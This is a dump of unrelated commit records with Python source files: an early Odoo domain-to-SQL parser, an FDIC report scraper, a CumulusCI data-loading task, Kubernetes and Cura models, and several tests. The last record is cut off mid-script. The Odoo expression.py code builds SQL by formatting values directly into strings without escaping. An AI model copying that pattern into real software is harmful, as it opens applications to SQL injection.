duardohdbackup/odoo,gsmartway/odoo,gvb/odoo,mkieszek/odoo,provaleks/o8,jeasoft/odoo,rschnapka/odoo,kifcaliph/odoo,GauravSahu/odoo,jiangzhixiao/odoo,storm-computers/odoo,FlorianLudwig/odoo,AuyaJackie/odoo,diagramsoftware/odoo,lsinfo/odoo,osvalr/odoo,ClearCorp-dev/odoo,mmbtba/odoo,Eric-Zhong/odoo,oihane/odoo,fuselock/odoo,gvb/odoo,JGarcia-Panach/odoo,doomsterinc/odoo,fdvarela/odoo8,tinkerthaler/odoo,pedrobaeza/odoo,matrixise/odoo,Eric-Zhong/odoo,nhomar/odoo,nuuuboo/odoo,jesramirez/odoo,nuncjo/odoo,markeTIC/OCB,slevenhagen/odoo,Daniel-CA/odoo,factorlibre/OCB,kirca/OpenUpgrade,QianBIG/odoo,Elico-Corp/odoo_OCB,rschnapka/odoo,syci/OCB,arthru/OpenUpgrade,juanalfonsopr/odoo,vnsofthe/odoo,Maspear/odoo,tinkhaven-organization/odoo,factorlibre/OCB,slevenhagen/odoo-npg,shaufi/odoo,alexteodor/odoo,kirca/OpenUpgrade,goliveirab/odoo,fossoult/odoo,nhomar/odoo,naousse/odoo,oasiswork/odoo,prospwro/odoo,hubsaysnuaa/odoo,bguillot/OpenUpgrade,sysadminmatmoz/OCB,shaufi10/odoo,thanhacun/odoo,sve-odoo/odoo,laslabs/odoo,nitinitprof/odoo,juanalfonsopr/odoo,Bachaco-ve/odoo,bguillot/OpenUpgrade,NeovaHealth/odoo,janocat/odoo,n0m4dz/odoo,diagramsoftware/odoo,sebalix/OpenUpgrade,CubicERP/odoo,camptocamp/ngo-addons-backport,andreparames/odoo,bealdav/OpenUpgrade,hopeall/odoo,janocat/odoo,hifly/OpenUpgrade,mmbtba/odoo,VielSoft/odoo,dariemp/odoo,sebalix/OpenUpgrade,Maspear/odoo,alexcuellar/odoo,codekaki/odoo,doomsterinc/odoo,Danisan/odoo-1,guewen/OpenUpgrade,optima-ict/odoo,mkieszek/odoo,draugiskisprendimai/odoo,bplancher/odoo,Bachaco-ve/odoo,lsinfo/odoo,Ichag/odoo,cloud9UG/odoo,fossoult/odoo,shivam1111/odoo,luistorresm/odoo,blaggacao/OpenUpgrade,tinkhaven-organization/odoo,ramadhane/odoo,gvb/odoo,aviciimaxwell/odoo,naousse/odoo,numerigraphe/odoo,ChanduERP/odoo,odootr/odoo,bwrsandman/OpenUpgrade,vrenaville/ngo-addons-backport,slevenhagen/odoo,nuncjo/odoo,BT-astauder/odoo,OpenUpgrade-dev/OpenUpgrade,tinkerthaler/odoo,fdvarela/odoo8,mlaitinen/odoo,florentx/OpenUpgrade,bobisme/odoo,acshan/odoo,brijeshkes
ariya/odoo,massot/odoo,sadleader/odoo,damdam-s/OpenUpgrade,havt/odoo,windedge/odoo,joshuajan/odoo,bakhtout/odoo-educ,gavin-feng/odoo,Ernesto99/odoo,ingadhoc/odoo,Endika/OpenUpgrade,SAM-IT-SA/odoo,matrixise/odoo,credativUK/OCB,guerrerocarlos/odoo,mvaled/OpenUpgrade,avoinsystems/odoo,gdgellatly/OCB1,oliverhr/odoo,mustafat/odoo-1,deKupini/erp,virgree/odoo,numerigraphe/odoo,rschnapka/odoo,odooindia/odoo,tvtsoft/odoo8,VitalPet/odoo,hassoon3/odoo,0k/odoo,slevenhagen/odoo-npg,laslabs/odoo,srsman/odoo,Codefans-fan/odoo,alexteodor/odoo,BT-ojossen/odoo,rdeheele/odoo,brijeshkesariya/odoo,naousse/odoo,incaser/odoo-odoo,ihsanudin/odoo,fuselock/odoo,florian-dacosta/OpenUpgrade,kybriainfotech/iSocioCRM,tinkerthaler/odoo,jesramirez/odoo,factorlibre/OCB,sv-dev1/odoo,osvalr/odoo,massot/odoo,minhtuancn/odoo,slevenhagen/odoo-npg,javierTerry/odoo,VielSoft/odoo,waytai/odoo,bplancher/odoo,savoirfairelinux/odoo,ramitalat/odoo,ovnicraft/odoo,JonathanStein/odoo,provaleks/o8,dgzurita/odoo,kirca/OpenUpgrade,mszewczy/odoo,BT-astauder/odoo,0k/OpenUpgrade,dalegregory/odoo,dezynetechnologies/odoo,jaxkodex/odoo,Eric-Zhong/odoo,colinnewell/odoo,windedge/odoo,numerigraphe/odoo,diagramsoftware/odoo,Maspear/odoo,idncom/odoo,odootr/odoo,ygol/odoo,dkubiak789/odoo,janocat/odoo,steedos/odoo,Adel-Magebinary/odoo,slevenhagen/odoo-npg,odoousers2014/odoo,KontorConsulting/odoo,jeasoft/odoo,SAM-IT-SA/odoo,dezynetechnologies/odoo,ygol/odoo,tarzan0820/odoo,blaggacao/OpenUpgrade,ramadhane/odoo,pplatek/odoo,sebalix/OpenUpgrade,MarcosCommunity/odoo,fgesora/odoo,wangjun/odoo,fuhongliang/odoo,zchking/odoo,ubic135/odoo-design,ingadhoc/odoo,blaggacao/OpenUpgrade,hoatle/odoo,SerpentCS/odoo,eino-makitalo/odoo,srimai/odoo,poljeff/odoo,SerpentCS/odoo,sergio-incaser/odoo,ovnicraft/odoo,massot/odoo,joariasl/odoo,Grirrane/odoo,aviciimaxwell/odoo,windedge/odoo,nitinitprof/odoo,gvb/odoo,ovnicraft/odoo,Nick-OpusVL/odoo,jusdng/odoo,CatsAndDogsbvba/odoo,cedk/odoo,gdgellatly/OCB1,pplatek/odoo,christophlsa/odoo,bguillot/OpenUpgrade,El
ico-Corp/odoo_OCB,bkirui/odoo,funkring/fdoo,leorochael/odoo,stonegithubs/odoo,Endika/odoo,rubencabrera/odoo,abdellatifkarroum/odoo,VielSoft/odoo,pedrobaeza/OpenUpgrade,KontorConsulting/odoo,leoliujie/odoo,nexiles/odoo,tangyiyong/odoo,cysnake4713/odoo,numerigraphe/odoo,fgesora/odoo,hmen89/odoo,OpusVL/odoo,Gitlab11/odoo,hubsaysnuaa/odoo,sergio-incaser/odoo,virgree/odoo,cpyou/odoo,nhomar/odoo,florian-dacosta/OpenUpgrade,Drooids/odoo,gsmartway/odoo,ovnicraft/odoo,x111ong/odoo,xujb/odoo,ramitalat/odoo,GauravSahu/odoo,x111ong/odoo,blaggacao/OpenUpgrade,ujjwalwahi/odoo,datenbetrieb/odoo,thanhacun/odoo,oliverhr/odoo,ApuliaSoftware/odoo,csrocha/OpenUpgrade,christophlsa/odoo,odoousers2014/odoo,vnsofthe/odoo,alqfahad/odoo,datenbetrieb/odoo,vnsofthe/odoo,apocalypsebg/odoo,hopeall/odoo,joariasl/odoo,JonathanStein/odoo,lightcn/odoo,leoliujie/odoo,sysadminmatmoz/OCB,Gitlab11/odoo,andreparames/odoo,lgscofield/odoo,savoirfairelinux/OpenUpgrade,havt/odoo,ChanduERP/odoo,camptocamp/ngo-addons-backport,mmbtba/odoo,ThinkOpen-Solutions/odoo,waytai/odoo,nagyistoce/odoo-dev-odoo,jpshort/odoo,nitinitprof/odoo,salaria/odoo,alexcuellar/odoo,bobisme/odoo,vrenaville/ngo-addons-backport,gavin-feng/odoo,florentx/OpenUpgrade,frouty/odoo_oph,syci/OCB,acshan/odoo,funkring/fdoo,dariemp/odoo,Nick-OpusVL/odoo,dgzurita/odoo,dgzurita/odoo,cysnake4713/odoo,waytai/odoo,takis/odoo,tvibliani/odoo,ChanduERP/odoo,frouty/odoogoeen,leorochael/odoo,AuyaJackie/odoo,microcom/odoo,bplancher/odoo,tinkhaven-organization/odoo,nitinitprof/odoo,ujjwalwahi/odoo,dsfsdgsbngfggb/odoo,Bachaco-ve/odoo,gdgellatly/OCB1,PongPi/isl-odoo,x111ong/odoo,ccomb/OpenUpgrade,OpusVL/odoo,gavin-feng/odoo,rowemoore/odoo,oliverhr/odoo,cedk/odoo,thanhacun/odoo,n0m4dz/odoo,dariemp/odoo,apanju/GMIO_Odoo,nagyistoce/odoo-dev-odoo,camptocamp/ngo-addons-backport,slevenhagen/odoo,grap/OpenUpgrade,luistorresm/odoo,hmen89/odoo,abdellatifkarroum/odoo,tinkerthaler/odoo,OSSESAC/odoopubarquiluz,xzYue/odoo,OpenPymeMx/OCB,spadae22/odoo,srsman/odoo,odootr/odoo
,ClearCorp-dev/odoo,xzYue/odoo,SAM-IT-SA/odoo,highco-groupe/odoo,vrenaville/ngo-addons-backport,christophlsa/odoo,Nick-OpusVL/odoo,Nowheresly/odoo,erkrishna9/odoo,jolevq/odoopub,podemos-info/odoo,florian-dacosta/OpenUpgrade,odoousers2014/odoo,odooindia/odoo,microcom/odoo,rowemoore/odoo,javierTerry/odoo,odoo-turkiye/odoo,ygol/odoo,highco-groupe/odoo,Codefans-fan/odoo,nuuuboo/odoo,storm-computers/odoo,nuncjo/odoo,minhtuancn/odoo,rubencabrera/odoo,fdvarela/odoo8,jusdng/odoo,credativUK/OCB,incaser/odoo-odoo,bakhtout/odoo-educ,Grirrane/odoo,addition-it-solutions/project-all,optima-ict/odoo,odoousers2014/odoo,brijeshkesariya/odoo,doomsterinc/odoo,Daniel-CA/odoo,demon-ru/iml-crm,nuncjo/odoo,camptocamp/ngo-addons-backport,bwrsandman/OpenUpgrade,TRESCLOUD/odoopub,CopeX/odoo,ovnicraft/odoo,idncom/odoo | bin/tools/expression.py | bin/tools/expression.py | #!/usr/bin/env python
def _is_operator( element ):
return isinstance( element, str ) and element in ['&','|']
def _is_leaf( element ):
return isinstance( element, tuple ) and len( element ) == 3 and element[1] in ['=', '<>', '!=', '<=', '<', '>', '>=', 'like', 'not like', 'ilike', 'not ilike']
def _is_expression( element ):
return isinstance( element, tuple ) and len( element ) > 2 and _is_operator( element[0] )
class expression_leaf(object):
    """A single (left, operator, right) comparison in a domain expression."""

    def __init__(self, operator, left, right):
        # Store the three pieces of the comparison verbatim.
        self.operator = operator
        self.left = left
        self.right = right

    def parse(self):
        # A leaf needs no further parsing; return self so calls chain like
        # expression.parse() does.
        return self

    def to_sql(self):
        """Render the comparison as an SQL fragment, e.g. "name = 'x'"."""
        return "{0} {1} {2}".format(self.left, self.operator, self.right)
class expression(object):
    """Parse a domain into a tree of ``expression`` / ``expression_leaf``
    nodes that ``to_sql()`` renders as a parenthesized SQL condition.

    Accepted inputs: a leaf triple wrapped in a list, an
    ``(operator, operand, ...)`` tuple, or a list of leaves (an implicit
    '&' is prepended when the list has no leading operator).
    """

    def __init__( self, exp ):
        # Normalize ``exp`` so it ends up as either a leaf triple or an
        # operator-prefixed tuple before parse() walks it.
        if isinstance( exp, tuple ):
            # A tuple that is neither a leaf nor operator-prefixed is really
            # a sequence of operands: route it through the list branch below.
            if not _is_leaf( exp ) and not _is_operator( exp[0] ):
                exp = list( exp )
        if isinstance( exp, list ):
            if len( exp ) == 1 and _is_leaf( exp[0] ):
                # [leaf] -> leaf
                exp = exp[0]
            else:
                if not _is_operator( exp[0][0] ):
                    # No explicit leading operator: AND the operands together.
                    exp.insert( 0, '&' )
                    exp = tuple( exp )
                else:
                    # First element starts with an operator (e.g. a wrapped
                    # composite tuple): unwrap it.
                    # NOTE(review): indentation was reconstructed from a
                    # flattened source; a flat list like ['|', leaf, leaf]
                    # would also land here and be collapsed to '|' -- confirm
                    # callers never pass that shape.
                    exp = exp[0]
        self.exp = exp
        # Defaults used when parse() finds a bare leaf (no explicit operator).
        self.operator = '&'
        self.children = []

    def parse( self ):
        """Build self.children from self.exp; returns self for chaining."""
        if _is_leaf( self.exp ):
            self.children.append( expression_leaf( self.exp[1], self.exp[0], self.exp[2] ).parse() )
        elif _is_expression( self.exp ):
            self.operator = self.exp[0]
            for element in self.exp[1:]:
                if not _is_operator( element ) and not _is_leaf(element):
                    # Nested sub-domain (list or composite tuple): recurse.
                    self.children.append( expression(element).parse() )
                else:
                    if _is_leaf(element):
                        self.children.append( expression_leaf( element[1], element[0], element[2] ).parse() )
        return self

    def to_sql( self ):
        """Render the parsed tree as '( a AND b ... )' / '( a OR b ... )'."""
        return "( %s )" % ((" %s " % {'&' : 'AND', '|' : 'OR' }[self.operator]).join([child.to_sql() for child in self.children]))
| agpl-3.0 | Python | |
8a86c1c9bec625b58c2dc4914837b2e3a0ef175c | Add FDIC | lukerosiak/inspectors-general,divergentdave/inspectors-general | inspectors/fdic.py | inspectors/fdic.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# http://www.fdicoig.gov
# Oldest report: 1998
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
REPORTS_URL = "http://www.fdicoig.gov/Search-Engine.asp"
def run(options):
  """Scrape the FDIC OIG reports table and save every report in range.

  ``options`` is forwarded to ``inspector.year_range`` to bound which
  publication years are kept.
  """
  year_range = inspector.year_range(options)

  # Pull the reports
  doc = BeautifulSoup(utils.download(REPORTS_URL))
  results = doc.find("table", {"cellpadding": "5"}).select("tr")
  for index, result in enumerate(results):
    if index < 3 or not result.text.strip():
      # The first three rows are headers; empty rows carry no report.
      continue
    # report_from returns None for rows without a parseable date or outside
    # the requested year range.
    report = report_from(result, year_range)
    if report:
      inspector.save_report(report)
def report_from(result, year_range):
  """Build a report dict from one table row (a BeautifulSoup tag).

  Returns None when the row has no parseable published date or its year is
  outside *year_range*. Rows without any link are treated as unreleased
  reports and point back at the listing page.
  """
  title = result.find("em").text.strip()

  unreleased = False
  try:
    # The last anchor in the row links to the report document.
    report_url = urljoin(REPORTS_URL, result.select("a")[-1].get("href"))
  except IndexError:
    # No link at all: the report exists but was not released.
    unreleased = True
    report_url = None
    landing_url = REPORTS_URL

  if report_url:
    # Derive a stable id from the document filename (extension dropped).
    report_filename = report_url.split("/")[-1]
    report_id, extension = os.path.splitext(report_filename)
  else:
    # Unreleased reports get a slug built from the title, capped at 50 chars.
    report_id = "-".join(title.split())[:50]

  # Third cell holds the publication date as MM/DD/YYYY.
  published_on_text = result.select("td")[2].text
  try:
    published_on = datetime.datetime.strptime(published_on_text, '%m/%d/%Y')
  except ValueError:
    logging.debug("[%s] Skipping since all real reports have published dates and this does not" % report_url)
    return

  if published_on.year not in year_range:
    logging.debug("[%s] Skipping, not in requested range." % report_url)
    return

  report = {
    'inspector': "fdic",
    'inspector_url': "http://www.fdicoig.gov",
    'agency': "fdic",
    'agency_name': "Federal Deposit Insurance Corporation",
    'report_id': report_id,
    'url': report_url,
    'title': title,
    'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
  }
  if unreleased:
    report['unreleased'] = unreleased
    report['landing_url'] = landing_url
  return report
utils.run(run) if (__name__ == "__main__") else None
| cc0-1.0 | Python | |
545ce0a57b92aaaa26e6f960990648dd05b637af | Add a new task for batch generation and loading. | SalesforceFoundation/CumulusCI,SalesforceFoundation/CumulusCI | cumulusci/tasks/bulkdata/generate_and_load_data.py | cumulusci/tasks/bulkdata/generate_and_load_data.py | import os
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from cumulusci.tasks.bulkdata import LoadData
from cumulusci.utils import temporary_dir
from cumulusci.core.config import TaskConfig
from cumulusci.core.utils import import_global
from cumulusci.core.exceptions import TaskOptionsError
class GenerateAndLoadData(BaseSalesforceApiTask):
    """ Orchestrate creating tempfiles, generating data, loading data, cleaning up tempfiles."""

    task_docs = """
    Use the `num_records` option to specify how many records to generate.
    Use the `mappings` option to specify a mapping file.
    Use 'data_generation_task' to specify what Python class to use to generate the data.'
    Use 'batch_size' to specify how many records to generate and upload in every batch.
    By default it creates the data in a temporary file and then cleans it up later. Specify database_url if you
    need more control than that. The use of both database_url and batch_size together is not currently supported.
    """

    task_options = {
        "num_records": {
            "description": "How many records to generate. Precise calcuation depends on the generator.",
            "required": True,
        },
        "batch_size": {
            "description": "How many records to create and load at a time..",
            "required": False,
        },
        "mapping": {"description": "A mapping YAML file to use", "required": True},
        "data_generation_task": {
            "description": "Fully qualified class path of a task to generate the data. Use cumulusci.tasks.bulkdata.factory_generator if you would like to use a Factory Module.",
            "required": False,
        },
        "data_generation_options": {
            "description": "Options to pass to the data generator.",
            "required": False,
        },
        "database_url": {
            # NOTE(review): "required" is the empty string here (falsy) while
            # every other option uses a bool -- confirm this is intentional.
            "description": "A URL to store the database (defaults to a transient SQLite file)",
            "required": "",
        },
    }

    def _run_task(self):
        # Validate inputs up front so we fail before creating any tempfiles.
        mapping_file = os.path.abspath(self.options["mapping"])
        assert os.path.exists(mapping_file), f"{mapping_file} cannot be found."
        database_url = self.options.get("database_url")
        num_records = int(self.options["num_records"])
        # Without an explicit batch_size everything goes in a single batch.
        batch_size = int(self.options.get("batch_size", num_records))
        if database_url and batch_size != num_records:
            # Batching reuses a fresh SQLite file per batch, which conflicts
            # with a caller-supplied database.
            raise TaskOptionsError(
                "You may not specify both `database_url` and `batch_size` options."
            )
        with temporary_dir() as tempdir:
            # One extra loop iteration picks up the remainder batch; a zero
            # remainder is skipped by the batch_size > 0 guard below.
            num_batches = (num_records // batch_size) + 1
            for i in range(0, num_batches):
                if i == num_batches - 1:  # last batch
                    batch_size = num_records - (batch_size * i)  # leftovers
                if batch_size > 0:
                    self._generate_batch(
                        database_url, tempdir, mapping_file, batch_size, i
                    )

    def _datagen(self, subtask_options):
        # Instantiate and run the configured data-generation task class.
        class_path = self.options.get("data_generation_task", None)
        task_class = import_global(class_path)
        task_config = TaskConfig({"options": subtask_options})
        data_gen_task = task_class(
            self.project_config, task_config, org_config=self.org_config
        )
        data_gen_task()

    def _dataload(self, subtask_options):
        # Push the generated rows into the org via the standard LoadData task.
        subtask_config = TaskConfig({"options": subtask_options})
        subtask = LoadData(
            project_config=self.project_config,
            task_config=subtask_config,
            org_config=self.org_config,
            flow=self.flow,
            name=self.name,
            stepnum=self.stepnum,
        )
        subtask()

    def _generate_batch(self, database_url, tempdir, mapping_file, batch_size, index):
        """Generate one batch into a (possibly temporary) DB, then load it."""
        if not database_url:
            # Per-batch throwaway SQLite file inside the temporary directory.
            sqlite_path = os.path.join(tempdir, f"generated_data_{index}.db")
            database_url = f"sqlite:///" + sqlite_path
        subtask_options = {
            **self.options,
            "mapping": mapping_file,
            "database_url": database_url,
            "num_records": batch_size,
        }
        self._datagen(subtask_options)
        self._dataload(subtask_options)
| bsd-3-clause | Python | |
cec3eebace1ad5f236761bdd98bef0d5ac52d3ba | Replace list-to-set cast with normal set literal | hmflash/Cura,fieldOfView/Cura,Curahelper/Cura,ynotstartups/Wanhao,ynotstartups/Wanhao,Curahelper/Cura,fieldOfView/Cura,hmflash/Cura | cura/Settings/MaterialSettingsVisibilityHandler.py | cura/Settings/MaterialSettingsVisibilityHandler.py | # Copyright (c) 2017 Ultimaker B.V.
# Uranium is released under the terms of the AGPLv3 or higher.
from UM.Settings.Models.SettingVisibilityHandler import SettingVisibilityHandler
class MaterialSettingsVisibilityHandler(SettingVisibilityHandler):
def __init__(self, parent = None, *args, **kwargs):
super().__init__(parent = parent, *args, **kwargs)
material_settings = {
"default_material_print_temperature",
"material_bed_temperature",
"material_standby_temperature",
"cool_fan_speed",
"retraction_amount",
"retraction_speed",
}
self.setVisible(material_settings)
| # Copyright (c) 2016 Ultimaker B.V.
# Uranium is released under the terms of the AGPLv3 or higher.
from UM.Settings.Models.SettingVisibilityHandler import SettingVisibilityHandler
class MaterialSettingsVisibilityHandler(SettingVisibilityHandler):
    """Visibility handler that exposes only the material-related settings.

    Passes a fixed set of setting keys to
    ``SettingVisibilityHandler.setVisible`` at construction time.
    """

    def __init__(self, parent = None, *args, **kwargs):
        super().__init__(parent = parent, *args, **kwargs)

        # Use a set literal instead of set([...]): same contents, no
        # intermediate list allocation.
        material_settings = {
            "default_material_print_temperature",
            "material_bed_temperature",
            "material_standby_temperature",
            "cool_fan_speed",
            "retraction_amount",
            "retraction_speed",
        }
        self.setVisible(material_settings)
| agpl-3.0 | Python |
8094267faf7a9cdbd1520383f51e537e159cdca2 | Add unit column unit tests. | kdeldycke/cqlengine-relation-columns | tests.py | tests.py | # -*- coding: utf-8 -*-
""" Test relation columns.
"""
import math
import uuid
from unittest import TestCase
import arrow
from cqlengine import columns
from cqlengine.models import Model
def truncate_to_milliseconds(date_time):
    """Return *date_time* as an arrow object truncated to millisecond precision.

    Used to emulate cqlengine's datetime conversion from Python to Cassandra,
    which only keeps millisecond resolution.
    """
    as_arrow = arrow.get(date_time)
    # Drop the sub-millisecond part of the microsecond field.
    whole_milliseconds = as_arrow.microsecond // 1000
    return as_arrow.replace(microsecond=whole_milliseconds * 1000)
class TestCompositeRelationColumn(TestCase):
    """Integration test for the CompositeRelation column type (Python 2)."""

    def test_column_io(self):
        """Round-trip a composite foreign key through write, reload and query."""
        # Target model: composite primary key (partition + clustering + uuid).
        class ForeignModel(Model):
            organization = columns.Text(partition_key=True)
            start_date = columns.DateTime(primary_key=True)
            key = columns.UUID(primary_key=True, default=uuid.uuid4)
            info = columns.Text()

        # Model holding the relation under test. (Intentionally shadows the
        # enclosing test-case class name inside this method only.)
        class TestCompositeRelationColumn(Model):
            key = columns.UUID(primary_key=True, default=uuid.uuid4)
            foreign_key = columns.CompositeRelation(model='ForeignModel')

        # Precondition: both tables start empty.
        self.assertEquals(ForeignModel.objects.count(), 0)
        self.assertEquals(TestCompositeRelationColumn.objects.count(), 0)

        now = arrow.utcnow()

        # Check initial value
        test_instance = TestCompositeRelationColumn.create()
        self.assertEquals(test_instance.foreign_key, {})

        # Check proper transformation of instance's primary key component's
        # values into a dict.
        foreign_instance = ForeignModel.create(
            organization='Dummy organization',
            start_date=now,
        )
        test_instance.update(foreign_key=foreign_instance)
        self.assertIsInstance(test_instance.foreign_key, dict)

        # Test serialization to raw strings. The datetime is stored as a
        # millisecond epoch string, matching Cassandra's timestamp precision.
        self.assertEquals(test_instance.foreign_key, {
            'organization': foreign_instance.organization,
            'start_date': str(long(truncate_to_milliseconds(
                foreign_instance.start_date).float_timestamp * 1000)),
            'key': str(foreign_instance.key),
        })

        # CompositeRelation column doesn't cast primary keys components on the
        # fly. It needs reload.
        test_instance = TestCompositeRelationColumn.get(test_instance.key)
        self.assertIsInstance(test_instance.foreign_key, dict)
        self.assertEquals(test_instance.foreign_key, {
            'organization': foreign_instance.organization,
            'start_date': truncate_to_milliseconds(
                foreign_instance.start_date),
            'key': foreign_instance.key,
        })

        # Check that CompositeRelation deserialize primary key components into
        # their original types.
        self.assertIsInstance(test_instance.foreign_key['organization'],
                              basestring)
        self.assertIsInstance(test_instance.foreign_key['start_date'],
                              arrow.arrow.Arrow)
        self.assertIsInstance(test_instance.foreign_key['key'],
                              uuid.UUID)

        # Check that a related object can be fetched from the raw dict
        fetched_model = ForeignModel.filter(**test_instance.foreign_key).get()
        self.assertDictContainsSubset({
            'organization': foreign_instance.organization,
            'start_date': truncate_to_milliseconds(
                foreign_instance.start_date),
            'key': foreign_instance.key,
        }, dict(fetched_model.items()))
| bsd-3-clause | Python | |
71f073ca40459c56ce666650af982a9f08d613f1 | Add support for PodDisruptionBudget | fiaas/k8s | k8s/models/pod_disruption_budget.py | k8s/models/pod_disruption_budget.py | #!/usr/bin/env python
# -*- coding: utf-8
from __future__ import absolute_import
import six
from .common import ObjectMeta
from ..base import Model
from ..fields import Field, ListField
class PodDisruptionBudgetMatchExpressions(Model):
    """One label-selector requirement: ``key`` ``operator`` ``values``."""
    key = Field(six.text_type)
    operator = Field(six.text_type)
    values = ListField(six.text_type)
class PodDisruptionBudgetSelector(Model):
    """Label selector choosing which pods the budget applies to."""
    # NOTE(review): in the Kubernetes API ``matchExpressions`` is a *list* of
    # requirements; a plain Field holds only one -- confirm whether
    # ListField(PodDisruptionBudgetMatchExpressions) was intended.
    matchExpressions = Field(PodDisruptionBudgetMatchExpressions)
    # Plain mapping of label keys to values.
    matchLabels = Field(dict)
class PodDisruptionBudgetSpec(Model):
    """Spec for a PodDisruptionBudget."""
    # Text fields, presumably because Kubernetes accepts either an integer or
    # a percentage string (e.g. "50%") here -- IntOrString in the API.
    minAvailable = Field(six.text_type)
    maxUnavailable = Field(six.text_type)
    selector = Field(PodDisruptionBudgetSelector)
class PodDisruptionBudget(Model):
    """A Kubernetes PodDisruptionBudget resource."""

    class Meta:
        # PodDisruptionBudget lives in the policy/v1beta1 API group (it was
        # never part of autoscaling), and resource names in API paths are
        # plural ("poddisruptionbudgets").
        url_template = "/apis/policy/v1beta1/namespaces/{namespace}/poddisruptionbudgets/{name}"

    metadata = Field(ObjectMeta)
    spec = Field(PodDisruptionBudgetSpec)
| apache-2.0 | Python | |
4c46b7b86171b89f0c85f6d48eaf6d24e702c6f9 | Add a Tasks sample that demonstrates Service accounts. | jonparrott/oauth2client,clancychilds/oauth2client,googleapis/oauth2client,jonparrott/oauth2client,clancychilds/oauth2client,googleapis/google-api-python-client,googleapis/google-api-python-client,googleapis/oauth2client,google/oauth2client,google/oauth2client | samples/service_account/tasks.py | samples/service_account/tasks.py | #!/usr/bin/python2.4
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple command-line sample that demonstrates service accounts.
Lists all the Google Task Lists associated with the given service account.
Service accounts are created in the Google API Console. See the documentation
for more information:
https://developers.google.com/console/help/#WhatIsKey
Usage:
$ python tasks.py
"""
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
import httplib2
import pprint
import sys
from apiclient.discovery import build
from oauth2client.client import SignedJwtAssertionCredentials
def main(argv):
  """Authorize with a service account and print the account's task lists."""
  # Load the key in PKCS 12 format that you downloaded from the Google API
  # Console when you created your Service account. A context manager
  # guarantees the handle is closed even if the read fails (and avoids the
  # deprecated file() builtin, which no longer exists in Python 3).
  with open('key.p12', 'rb') as f:
    key = f.read()

  # Create an httplib2.Http object to handle our HTTP requests and authorize it
  # with the Credentials. Note that the first parameter, service_account_name,
  # is the Email address created for the Service account. It must be the email
  # address associated with the key that was created.
  credentials = SignedJwtAssertionCredentials(
      '141491975384@developer.gserviceaccount.com',
      key,
      scope='https://www.googleapis.com/auth/tasks')
  http = httplib2.Http()
  http = credentials.authorize(http)

  service = build("tasks", "v1", http=http)

  # List all the tasklists for the account.
  lists = service.tasklists().list().execute(http)
  pprint.pprint(lists)


if __name__ == '__main__':
  main(sys.argv)
| apache-2.0 | Python | |
b541d4c9ab1d7f199cc551179f454c5c3a53625f | add tests for "patch" command | red-hat-storage/rhcephpkg,red-hat-storage/rhcephpkg | rhcephpkg/tests/test_patch.py | rhcephpkg/tests/test_patch.py | import os
import pytest
from rhcephpkg import Patch
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
FIXTURES_DIR = os.path.join(TESTS_DIR, 'fixtures')
class FakePatch(object):
    """Minimal stand-in for a patch object; tests assign attributes ad hoc."""
    pass
class TestPatch(object):
    """Unit tests for the rhcephpkg ``patch`` command."""

    def test_wrong_branch(self, monkeypatch):
        # Point $HOME at the fixtures dir so Patch reads the test config, and
        # fake the current branch as a plain (non patch-queue) branch.
        monkeypatch.setenv('HOME', FIXTURES_DIR)
        monkeypatch.setattr('rhcephpkg.util.current_branch',
                            lambda: 'ceph-2-ubuntu')
        patch = Patch(())
        # _run() must refuse to operate outside a patch-queue branch.
        with pytest.raises(SystemExit) as e:
            patch._run()
        assert str(e.value) == 'ceph-2-ubuntu is not a patch-queue branch'

    def test_get_rhbzs(self, monkeypatch):
        p = Patch(())
        # A patch whose subject/description mention no RHBZ numbers must
        # yield an empty result.
        fakepatch = FakePatch()
        fakepatch.subject = 'my git change'
        fakepatch.long_desc = 'my long description about this change'
        bzs = p.get_rhbzs(fakepatch)
        assert len(bzs) == 0
        # TODO: more tests here, for commits that really contain RHBZs.
# TODO: more tests here, for commits that really contain RHBZs.
# TODO: more tests, faking check_call and check_output, to verify that
# we're running the proper gbp and git commands.
| mit | Python | |
ed27c75a2d3400955d8e3e85d08d480db3fd3657 | Add generate_vocab script | chunfengh/seq2seq,shashankrajput/seq2seq,google/seq2seq,shashankrajput/seq2seq,liyi193328/seq2seq,kontact-chan/seq2seq,kontact-chan/seq2seq,liyi193328/seq2seq,liyi193328/seq2seq,liyi193328/seq2seq,chunfengh/seq2seq,kontact-chan/seq2seq,shashankrajput/seq2seq,chunfengh/seq2seq,google/seq2seq,kontact-chan/seq2seq,liyi193328/seq2seq,google/seq2seq,chunfengh/seq2seq,shashankrajput/seq2seq,google/seq2seq | seq2seq/scripts/generate_vocab.py | seq2seq/scripts/generate_vocab.py | #! /usr/bin/env python
#pylint: disable=invalid-name
"""
Generate vocabulary for a tokenized text file.
"""
import argparse
import collections
def _str2bool(value):
  """Parse a textual boolean CLI value.

  argparse's ``type=bool`` is a trap: ``bool("False")`` is True because any
  non-empty string is truthy, so ``--downcase False`` previously *enabled*
  downcasing. Accept the usual spellings of "true" instead; everything else
  (including "False") is False.
  """
  return str(value).lower() in ("yes", "true", "t", "1")


parser = argparse.ArgumentParser(description="Generate vocabulary for a tokenized text file.")
parser.add_argument("--input_file", type=str, help="path to the input file", required=True)
parser.add_argument("--output_file", type=str, help="path to the vocabulary file", required=True)
parser.add_argument("--min_frequency", dest="min_frequency", type=int, default=0,
                    help="Minimum frequency of a word to be included in the vocabulary.")
parser.add_argument("--max_vocab_size", dest="max_vocab_size", type=int,
                    help="Maximum number of words in the vocabulary")
parser.add_argument("--downcase", dest="downcase", type=_str2bool,
                    help="If set to true, downcase all text before processing.", default=False)
args = parser.parse_args()

# Counter for all words in the vocabulary
cnt = collections.Counter()

with open(args.input_file) as f:
  for line in f:
    if args.downcase:
      line = line.lower()
    # Input is pre-tokenized: tokens are separated by single spaces.
    tokens = line.strip().split(" ")
